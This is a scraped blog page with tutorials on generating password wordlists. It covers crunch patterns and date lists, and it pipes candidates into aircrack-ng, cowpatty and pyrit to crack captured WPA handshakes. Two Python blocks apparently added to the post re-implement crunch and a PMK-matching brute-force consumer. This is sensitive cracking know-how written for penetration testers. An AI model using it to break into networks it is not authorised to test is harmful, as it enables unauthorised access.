The below example is using <span style="color: yellow;">'abcdef' as lower alpha charset</span>, the <span style="color: yellow;">full upper case charset</span>, <span style="color: yellow;">'12345' as numeric charset</span> and the <span style="color: yellow;">full special character charset</span>.<br />
<div style="color: lime;">
./crunch 8 8 abcdef + 12345 + -t @@,,%%^^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms2.jpg" width="640" /></a></div>
<br />
Although in the above examples @ is used as fixed character set for lower case values, we can also use it to specify a manually chosen single set of all types of characters ;<br />
<div style="color: lime;">
./crunch 8 8 123abcDEF -t TEST@@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms3.jpg" width="640" /></a></div>
<br />
<div style="color: lime;">
./crunch 10 10 123abc+-= -t @@@test@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms4.jpg" width="640" /></a></div>
<br />
Remember that certain characters on some occasions require escaping; if in doubt, it's better to just do it.<br />
<div style="color: lime;">
./crunch 10 10 123abcDEF\!\@\# -t TESTING@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms5.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms5.jpg" width="640" /></a></div>
<br />
If you want to include a space in the charset, then enclose the charset in quotes ;<br />
(space at end of charset below) <br />
<div style="color: lime;">
./crunch 8 8 "123abcDEF " -t TEST@@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms6.jpg" width="640" /></a></div>
<br />
<u><b>Creating telephone lists</b></u><br />
You can also use the -t switch to easily make lists of telephone numbers, so if for instance the telephone number<br />
is usually noted as for instance; 0131-321654, then you could easily create a wordlist of telephone numbers following that same example ;<br />
<div style="color: lime;">
./crunch 11 11 -t 0131-%%%%%%</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel1.jpg" width="640" /></a></div>
<br />
Or if the layout is different, for instance including a space such as "(01201) 111111", this is achieved by putting quotes around the -t pattern as follows (to ensure that the space is included);<br />
<div style="color: lime;">
./crunch 14 14 -t "(01201) %%%%%%"</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_tel2.jpg" width="640" /></a></div>
<br />
Endless variations are possible.<br />
<br />
The possibilities crunch offers to create patterns with such detail give you many options to really fine-tune what you want placed where in your passphrase wordlist and thus reduce the size of your final wordlist. <br />
<br />
<br />
<div style="color: yellow;">
<b><u>ESCAPING / FIXING SPECIAL CHARACTERS FOR USE IN PATTERNS</u></b></div>
When you start manually defining what to place where with special characters, you will on some occasions need to 'escape' characters to allow crunch to read them correctly.<br />
<br />
This is the case for instance with an exclamation mark <span style="color: red;">!</span> ; <br />
<div style="color: lime;">
./crunch 4 4 -t 12!@</div>
will result in an error.<br />
In order to make it work correctly you must 'escape' the exclamation mark ;<br />
<div style="color: lime;">
./crunch 4 4 -t 12\!@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_escape.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_escape.jpg" width="640" /></a></div>
<br />
As some special characters are used to define character sets, this causes limitations when trying to fix the position of such a character. Take wanting to use <b>@</b> as a fixed character ;<br />
./crunch 4 4 -t 012@<br />
or<br />
./crunch 4 4 -t 012\@<br />
Neither will fix the character '@'. Escaping only stops the shell from interpreting it; what reaches crunch is still the placeholder, and it will be used to provide lower case alpha values.<br />
<br />
To remedy this to some extent, since crunch v3.0 the new <b style="color: red;">-l</b> switch can be used to treat a placeholder character as a literal character instead of having it refer to a character set. <br />
<br />
This is now accomplished by doing ;<br />
<div style="color: lime;">
./crunch 6 6 -t b@d%%% -l @</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_1.jpg" width="640" /></a></div>
<br />
Other possibilities; <br />
<div style="color: lime;">
./crunch 8 8 -t P@SS%%%% -l @</div>
<div style="color: lime;">
</div>
<div style="color: lime;">
./crunch 8 8 -t P@\$\$,,,, -l @</div>
etc. etc.<br />
<br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha -t pass^^@@ -l ^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_2.jpg" width="640" /></a></div>
<br />
Also, more than 1 placeholder character can be fixed as a literal character; <br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha -t pass@,%^ -l %^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_3.jpg" width="640" /></a></div>
<br />
Of course this in itself also has limitations, as you are not able to check for all possible lower case alpha values, or pass through a user-defined charset, while the @ character is fixed.<br />
The 2 examples below will only return 1 result, as every instance of the @ character is fixed as a literal character. <br />
<div style="color: lime;">
./crunch 8 8 -t p@ss@@@@ -l @</div>
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha-numeric -t p@ss@@@@ -l @</div>
This is an issue that is being looked into and possibly a following update of crunch will have an answer.<br />
<br />
Of course there are workarounds for part of it; if for instance you wanted a password list starting with "p@ss"<br />
followed by 4 characters of all possible lower case values, you could create a list of the 4 characters (lower case alpha is crunch's default charset);<br />
<div style="color: lime;">
./crunch 4 4 -o test.txt</div>
<br />
And then use 'sed' or 'awk' to place the word 'p@ss' in front of each line (@ has no special meaning to sed or awk, so it needs no escaping there) ;<br />
Using sed ;<br />
<div style="color: lime;">
sed 's/^/p@ss/' test.txt > file1.txt</div>
Using awk ;<br />
<div style="color: lime;">
awk '{print "p@ss" $0}' test.txt > file1.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_arnd.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_arnd.jpg" width="640" /></a></div>
<br />
So with a bit of imagination and a couple of oneliners with sed or awk, you should still<br />
be able to create more or less what you want. <br />
<br />
<u><i>edit 25-05-2011</i></u><br />
bofh28 has informed me of another workaround which can be used.<br />
<br />
You can override the character set a placeholder stands for by passing a different charset in that placeholder's position, and then use that placeholder wherever you want those characters. <br />
<br />
Normally the 3rd position is the numeric charset, so % produces digits. If you pass lower case values in the 3rd position instead, % produces those letters, which leaves @ free to be fixed as a literal with -l.<br />
<br />
Confused ? You won't be after this episode of .. ;) <br />
<br />
<span style="color: lime;">./crunch 8 8 + + abcdefghijklmnopqrstuvwxyz + -t p@ss%%%% -l @</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_wrkarnd2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_l_wrkarnd2.jpg" width="640" /></a></div>
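To make the -l behaviour and the charset-override workaround above explicit, here is a small Python re-implementation of crunch's -t pattern semantics. This is an added example, not crunch's own code: the placeholder letters (@ , % ^), the -l literal list and the positional charset override follow the descriptions on this page, while the default symbol set is an assumption standing in for crunch's. The word order (rightmost position varies fastest) and the line/byte figures match what crunch reports.

```python
"""Re-implementation of crunch's -t / -l pattern semantics (added example, not crunch code)."""
import itertools
import string

# crunch placeholders: @ lower alpha, , upper alpha, % digits, ^ symbols.
# The symbol string is an assumed stand-in for crunch's default symbol set.
DEFAULT_CHARSETS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",
}


def columns(pattern, literals="", charsets=None):
    """One charset (or one fixed character) per output position.

    literals : placeholder characters that must be kept as-is (crunch's -l switch)
    charsets : {placeholder: charset} overrides, the effect of the positional
               charsets in `crunch 8 8 + + abcdefghijklmnopqrstuvwxyz + ...`
    """
    sets = dict(DEFAULT_CHARSETS)
    if charsets:
        sets.update(charsets)
    cols = []
    for ch in pattern:
        if ch in sets and ch not in literals:
            cols.append(sets[ch])   # placeholder: varies over its charset
        else:
            cols.append(ch)         # fixed character, or a placeholder named in -l
    return cols


def expand_pattern(pattern, literals="", charsets=None):
    """Yield every word the pattern describes, rightmost position varying fastest."""
    for combo in itertools.product(*columns(pattern, literals, charsets)):
        yield "".join(combo)


def count_pattern(pattern, literals="", charsets=None):
    """(lines, bytes incl. newlines): the figures crunch prints before it starts."""
    lines = 1
    for col in columns(pattern, literals, charsets):
        lines *= len(col)
    return lines, lines * (len(pattern) + 1)


if __name__ == "__main__":
    # The limitation: every @ is literal, so only one word comes out.
    print(list(expand_pattern("p@ss@@@@", literals="@")))
    # The workaround: % now yields lower case, @ stays literal.
    words = expand_pattern("p@ss%%%%", literals="@",
                           charsets={"%": string.ascii_lowercase})
    print(next(words), count_pattern("p@ss%%%%", "@", {"%": string.ascii_lowercase}))
```

Once the pattern is past the shell, `!` is an ordinary character (`expand_pattern("12!@")` gives 12!a .. 12!z), which is why escaping it is a shell matter and not a crunch one; `@` on the other hand is a placeholder in crunch itself, which is why only -l, not a backslash, can fix it.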
<br />
<div style="color: yellow;">
<b><u>PIPING CRUNCH THROUGH TO OTHER PROGRAMS</u></b></div>
<div style="color: yellow;">
<br /></div>
Crunch can be used to pipe passwords through to programs such as aircrack-ng / pyrit / cowpatty etc.<br />
<br />
Since crunch now prints the estimated size and line count of the wordlist before it starts generating, it is recommended to add the <b><span style="color: red;">-u</span></b> option when piping, to suppress that information and the 3 second delay that goes with it, so the wordlist is produced straight away; crunch expects -u to be the last option on the command line. <br />
Without -u, some programs on the receiving end of the pipe may behave unexpectedly.<br />
<br />
<br />
In the examples below only 8 character numeric passwords are tested (-t %%%%%%%% gives the same list as passing 0123456789 as the charset) ;<br />
<u>aircrack</u><br />
./crunch 8 8 -t %%%%%%%% -u | aircrack-ng -e SSID -w - /pathto/capfile.cap<br />
<br />
<u>cowpatty</u> <br />
./crunch 8 8 -t %%%%%%%% -u | cowpatty -f - -r /pathto/capfile.cap -s SSID<br />
<br />
<u>pyrit</u><br />
./crunch 8 8 -t %%%%%%%% -u | pyrit -i - -r /pathto/capfile.cap -e ESSID attack_passthrough<br />
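The receiving side of such a pipe, as an added example that is not part of the original post or of any of the tools named: a Python consumer that reads one candidate per line from stdin (the `-w -` / `-f -` / `-i -` contract), discards anything that cannot be a WPA passphrase, derives the PMK for each candidate with PBKDF2-HMAC-SHA1 as WPA2-PSK specifies, and stops at the first match against a known PMK. The real crackers go on to derive the PTK and check the handshake MIC against the capture; the PMK comparison here stands in for that step. The SSID, passphrase and stream contents are constructed for the demonstration, and `numeric_candidates` is a stand-in for `crunch 8 8 -t %%%%%%%% -u` when crunch is not to hand.

```python
"""Consumer side of `crunch ... -u | tool ... -` (added example, not aircrack/cowpatty/pyrit code)."""
import hashlib
import sys


def pmk(passphrase: str, ssid: str) -> bytes:
    # WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def is_candidate(line: str) -> bool:
    # 802.11i limits a PSK passphrase to 8..63 printable ASCII characters.
    # Anything else in the stream (status text, blank lines) is skipped, not tried.
    return 8 <= len(line) <= 63 and all(32 <= ord(c) <= 126 for c in line)


def find_passphrase(lines, ssid: str, target_pmk: bytes):
    """Walk the candidate stream; return (passphrase or None, tried, skipped)."""
    tried = skipped = 0
    for raw in lines:
        cand = raw.rstrip("\r\n")
        if not is_candidate(cand):
            skipped += 1
            continue
        tried += 1
        if pmk(cand, ssid) == target_pmk:
            return cand, tried, skipped
    return None, tried, skipped


def numeric_candidates(length: int):
    """Same stream as `crunch N N -t %%%...% -u`: every N-digit number, one per line."""
    for n in range(10 ** length):
        yield f"{n:0{length}d}\n"


if __name__ == "__main__":
    # usage: crunch 8 8 -t %%%%%%%% -u | python3 pmk_consumer.py SSID <pmk-hex>
    ssid, target = sys.argv[1], bytes.fromhex(sys.argv[2])
    found, tried, skipped = find_passphrase(sys.stdin, ssid, target)
    print(f"tried={tried} skipped={skipped} found={found}")
```

Because the consumer reads line by line, the generator never has to hold the whole list in memory or on disk, which is the point of piping crunch rather than writing the wordlist out first; the 4096-round PBKDF2 per candidate is also why the 100 million 8-digit candidates above take hours on a CPU and why the GPU-backed pyrit exists.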
<br />
<br />
<div style="color: yellow;">
<u><b>COMPRESSING OUTPUT FILES</b></u></div>
<br />
Output files can be compressed with crunch using the <b><span style="color: red;">-z</span></b> switch (it compresses the file written with -o, so it has no effect on output piped to stdout).<br />
<br />
Supported formats are;<br />
> gzip<br />
> bzip2<br />
> lzma<br />
<br />
Crunch first writes the complete wordlist and only then compresses it, so you need disk space for the uncompressed list while it runs.<br />
Upon completion of the wordlist you will see 100% being reached,<br />
and 100% will continue to be printed until the compression is complete.<br />
<br />
So if you see a continuous 'stream' of 100%, don't worry, the program is not hanging,<br />
the output file is simply being compressed. <br />
It had me guessing when I was testing a compression of a couple of gigabytes.. but I assure you it is the case.<br />
<br />
The best (smallest) compression, and thus the slowest, is obtained with lzma.<br />
The quickest compression, with the lowest level of compression, is obtained with gzip; bzip2 sits in between on both counts.<br />
<br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst lalpha -o test.txt -z gzip</div>
To unzip the created file ;<br />
<span style="color: lime;">gunzip test.txt.gz </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_g_gz.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_g_gz.jpg" width="640" /></a></div>
<br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst lalpha -o test.txt -z bzip2</div>
To decompress the created file ;<br />
<div style="color: lime;">
bunzip2 test.txt.bz2</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_bz.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_bz.jpg" width="640" /></a></div>
<br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst lalpha -o test.txt -z lzma</div>
To decompress the created file ;<br />
<div style="color: lime;">
unlzma test.txt.lzma</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_lz.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_z_lz.jpg" width="640" /></a></div>
<br />
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =<br />
<br />
<br />
<br />
If you managed to come this far, well done, you are a patient / dedicated person :) <br />
Hope it wasn't too boring to go through ;)<br />
<br />
<br />
bofh28 has once again done a fantastic job in reaching the 3.0 milestone and<br />
a little birdy tells me there is yet more to come :D<br />
If and when revisions come out, I will try to keep this post updated to reflect the changes / additions.<br />
<br />
<br />
<b>Keep up the great work bofh28 !!</b><br />
<b><br />
</b><br />
<b><br />
</b><br />
<span style="color: red;">To actually manipulate an already created/existing wordlist, check out ; </span><br />
<a href="http://www.adaywithtape.blogspot.com/2011/07/wordlist-manipulation-revisited.html"><b>http://www.adaywithtape.blogspot.com/2011/07/wordlist-manipulation-revisited.html</b></a> </div>
Unknownnoreply@blogger.com325tag:blogger.com,1999:blog-8356530514965708840.post-16461967971996621622011-05-04T16:26:00.001+02:002011-05-04T16:26:47.321+02:00Getting to grips with WiFi<b><u>WIRELESS ONE O ONE </u></b><br />
<br />
<br />
This is just really a shout-out to the fantastic work that Vivek is doing on his site;<br />
<br />
<a href="http://www.securitytube.net/">http://www.securitytube.net/</a><br />
He is currently creating a megaprimer on the various uses of the wireless capabilities<br />
and I strongly suggest you take a look at his videos on the subject.<br />
<br />
It now stands at 18 videos (as of today, 04-05-2011) and it is a very detailed<br />
look at how things work and what vulnerabilities are out there that you should be<br />
aware of.<br />
<br />
His videos are very clear and detailed and worth your time in checking them out.<br />
<br />
Go for it and learn a lot at ;<br />
<br />
<a href="http://www.securitytube.net/">http://www.securitytube.net/</a>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8356530514965708840.post-8638691069109145442011-03-03T21:55:00.034+01:002012-08-12T10:24:18.265+02:00Creating wordlists based on dates<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #6aa84f;">
<br /></div>
<b style="color: #6aa84f;">wordlists based on dates</b><br />
<span style="color: #6aa84f;">======================</span><br />
<br />
<br />
<span style="color: red;"><b>Update 5</b></span><br />
24-06-2012<br />
Have released datelist v0.7<br />
- Fixed bug with February being excluded from whole century years<br />
(was a bug in leapyear calculations) <b><i>-- Thanks to stepking2</i></b><br />
- Fixed bug with July being omitted from results <b><i>--</i></b><span style="background-color: white;"><b><i>Thanks to stepking2</i></b></span><br />
- Included options to prepend or append word/character direct from command line<br />
DOWNLOAD;<br />
<b><span style="color: blue;"><a href="http://www.mediafire.com/file/wj1ncopb4cruhai/datelist_v0-7">http://www.mediafire.com/file/wj1ncopb4cruhai/datelist_v0-7</a></span></b><br />
<br />
23-12-2011<br />
Have now released datelist v0.6<br />
- Not limited to any dates anymore (yay !)<br />
- Much faster<br />
- Included more error checks<br />
- Totally awesome ;)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="390" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-6.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<div style="color: red;">
<b>Update 3 </b></div>
<div style="color: red;">
<b>02-04-2011 </b></div>
<b>==========<br style="color: #cccccc;" /> </b><br />
<div style="color: black;">
<span style="color: #cccccc;">So have completed the work on v0.4, video & download location here below.</span></div>
<div style="color: #cccccc;">
It's still slow and limited to 1902 -- 2037 dates (the range a 32-bit time_t covers, which is all GNU date on a 32-bit system can represent), but seems a bit better </div>
<div style="color: #cccccc;">
(to look at at least :) ) </div>
<div style="color: #cccccc;">
Until I get to grips with Python or Perl enabling me to massively increase the speed</div>
<div style="color: #eeeeee;">
<div style="color: #cccccc;">
it will probably stay as it is now.<br />
<u>edit 01-05-2010</u>; <br />
Gitsnik put his mind to it (probably whilst reading the paper on the john, things come easier to him ;) )<br />
and wrote a fantastic bit of perl that does it sooo much faster and without any date limitations, when I manage<br />
to replicate that will put it up as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v04.jpg" width="640" /></a></div>
<br /></div>
<span style="color: black;"><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/q4Oof8BVbmc" title="YouTube video player" width="480"></iframe></span><br />
<div style="color: black;">
<div style="color: red;">
<br />
<b><span style="color: #cccccc;">Or on bliptv ;</span> </b><br />
<b><a href="http://blip.tv/file/4969508">http://blip.tv/file/4969508</a></b><br />
<br /></div>
</div>
<b><br />
</b></div>
<div style="color: red;">
<b>Update 2</b></div>
<b style="color: red;">=======</b><br />
Am working on v0.4 to be able to do the same directly from command line, should be less<br />
invasive on the eyes for the command line freaks and hopefully a tad quicker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-4.jpg" width="640" /></a></div>
<br />
<br />
<br />
<div style="color: red;">
<b>Update 1</b></div>
<div style="color: red;">
<b>======= </b><br />
<br /></div>
Put up a quick video on a revision; datelist_v0.3 <br />
<iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/FEXbxbjh-eU" title="YouTube video player" width="480"></iframe><br />
<br />
<div style="color: red;">
<b>=======</b></div>
<br />
I occasionally get queries on how to create certain wordlists with crunch, for which in some cases<br />
crunch is not really suited.<br />
This is the case when dealing with dates for instance.<br />
<br />
I had asked bofh28 (author of crunch) whether he felt that this was something to consider for inclusion<br />
in crunch, however he did not feel this was within the scope of what crunch is intended for and of course<br />
he's right, crunch's scope is meant to create a true bruteforce list.<br />
<br />
<br />
So, after having had a few queries on it, I dabbled a bit in how this could be done.<br />
<br />
<br />
After quite a bit of brain teasing (I am a slow learner ;) ) I got a date list in the format ddmmyyyy with the following code (it relies on the -d option of GNU date, so it will not run as-is with BSD/macOS date) ;<br />
>copy/paste the below code and save as for instance date-test<br />
>make executable with: <span style="color: lime;">chmod 755 date-test</span> to allow to run it; <span style="color: lime;">./date-test</span><br />
<br />
<span style="color: lime;">#!/bin/bash -e</span><br />
<span style="color: lime;"># Starting and stopping dates</span><br />
<span style="color: lime;">echo "Enter the starting date"</span><br />
<span style="color: lime;">echo "must be in the format yyyy-mm-dd"</span><br />
<span style="color: lime;">(tput bold && tput setaf 1)</span><br />
<span style="color: lime;">read START_DATE</span><br />
<span style="color: lime;">(tput sgr 0) </span><br />
<span style="color: lime;">echo "Enter the ending date"</span><br />
<span style="color: lime;">echo "must be in the format yyyy-mm-dd"</span><br />
<span style="color: lime;">(tput bold && tput setaf 1)</span><br />
<span style="color: lime;">read END_DATE</span><br />
<span style="color: lime;">(tput sgr 0)</span><br />
<span style="color: lime;"># Normalise both dates through GNU date; a date it cannot parse aborts the script here (bash -e)</span><br />
<span style="color: lime;">START_DATE=$( date +%Y-%m-%d -d "$START_DATE" )</span><br />
<span style="color: lime;">END_DATE=$( date +%Y-%m-%d -d "$END_DATE" )</span><br />
<span style="color: lime;"># Refuse an ending date before the starting date, the loop below would otherwise never end</span><br />
<span style="color: lime;">if [ "$( date +%s -d "$END_DATE" )" -lt "$( date +%s -d "$START_DATE" )" ]</span><br />
<span style="color: lime;">then</span><br />
<span style="color: lime;">echo "ending date must not be before the starting date" >&2</span><br />
<span style="color: lime;">exit 1</span><br />
<span style="color: lime;">fi</span><br />
<span style="color: lime;"># List all dates in between the chosen dates, one day at a time, then reorder to ddmmyyyy</span><br />
<span style="color: lime;">echo "$START_DATE" | tee r_dates.txt</span><br />
<span style="color: lime;">while [ "$START_DATE" != "$END_DATE" ]</span><br />
<span style="color: lime;">do</span><br />
<span style="color: lime;">START_DATE=$( date +%Y-%m-%d -d "$START_DATE +1 day" )</span><br />
<span style="color: lime;">echo "$START_DATE" | tee -a r_dates.txt</span><br />
<span style="color: lime;">done</span><br />
<span style="color: lime;">awk -F- '{print $3 $2 $1}' r_dates.txt > datelist.txt</span><br />
<span style="color: lime;">rm r_dates.txt</span><br />
<span style="color: lime;">echo</span><br />
<span style="color: lime;">(tput setaf 2 && tput bold)</span><br />
<span style="color: lime;">echo "wordlist 'datelist.txt' created in the format ;"</span><br />
<span style="color: lime;">echo</span><br />
<span style="color: lime;">(tput setaf 6 && tput bold)</span><br />
<span style="color: lime;">head -5 datelist.txt</span><br />
<span style="color: lime;">(tput sgr 0)</span><br />
<span style="color: lime;">echo ""</span><br />
<br />
Not an easy few lines to remember.. at least for me..<br />
So after having done that, there was some desire to be able to change the output format to other formats,<br />
we each have our own preference !<br />
<br />
Going through it a bit more and trying to improve it I came up with datelist v0.2<br />
Now I am sure there must be easier ways to accomplish the same thing.. but it just simply escaped me.. <br />
<br />
Basically a pretty untidy mess code-wise, but it seems to more or less do the trick.<br />
<br />
Following a query on how to make a certain wordlist, I also included a possibility<br />
to either prepend or append additional numbers (max 5) to the created wordlist.<br />
I am not sure that the way it is done is the most effective and will probably re-visit that part. <br />
<br />
<br />
<span style="color: red;">If anyone feels like having a shot at trying it out, you can download it</span> <span style="color: red;">here</span>;<br />
Edit 23-12-2011<br />
All previous versions superseded by v0.6, see download link at top of page.<br />
<br />
Starting it up (of course use filename that is appropriate for the download you have done);<br />
<br />
<div style="color: lime;">
./datelist</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist01.jpg" width="640" /></a></div>
<br />
Starting with format option -1 used and entering the Start and End dates ;<br />
<br />
<div style="color: lime;">
./datelist -1</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist02.jpg" width="640" /></a></div>
<br />
Starting .. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist03.jpg" width="640" /></a></div>
<br />
Upon completion of the creation of datelist.txt, the 1st 5 lines of the created file will be shown to confirm<br />
the output format.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist04.jpg" width="640" /></a></div>
<br />
<div style="color: #6aa84f;">
<u><b>APPENDING OR PREPENDING SEQUENTIAL NUMBERS </b></u></div>
<br />
I also included a method of appending or prepending up to 5 sequential numeric values (0-9) to the created datelist.txt file. <br />
Not quite sure how useful this is or to whom.. not really for me, but hey, the question came up ;)<br />
<br />
This can be done with the -a (append) or -p (prepend) after having created the datelist.txt file.<br />
<br />
Appending 2 numeric characters sequentially with the -a switch and showing the result by showing the last<br />
5 lines of the file.<br />
<br />
<div style="color: lime;">
./datelist -a</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist05.jpg" width="640" /></a></div>
<br />
Prepending 2 numeric characters sequentially with the -p switch and showing the result by showing the last<br />
5 lines of the file.<br />
<br />
<div style="color: lime;">
./datelist -p</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist06.jpg" width="640" /></a></div>
